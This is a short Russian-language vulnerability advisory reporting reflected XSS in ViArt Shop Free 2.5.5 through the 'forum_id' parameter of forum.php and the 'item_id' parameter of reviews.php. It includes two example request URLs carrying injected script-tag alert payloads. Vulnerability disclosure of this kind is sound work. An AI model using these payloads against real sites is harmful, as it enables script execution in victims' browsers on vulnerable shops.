Программа: ViArt Shop Free 2.5.5, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметре "forum_id" в сценарии forum.php и в параметре "item_id" в сценарии reviews.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Примеры:

/forum.php?forum_id="><script>alert(‘XSS’);</script>&category_id=1

/reviews.php?category_id=0&item_id=4&rnd=1149618267&action=1&item_id="> <script>alert(‘XSS’)</script>&category_id=0&recommended=1&rating=0& summary=1&comments=1&user_name=1



Оставить мнение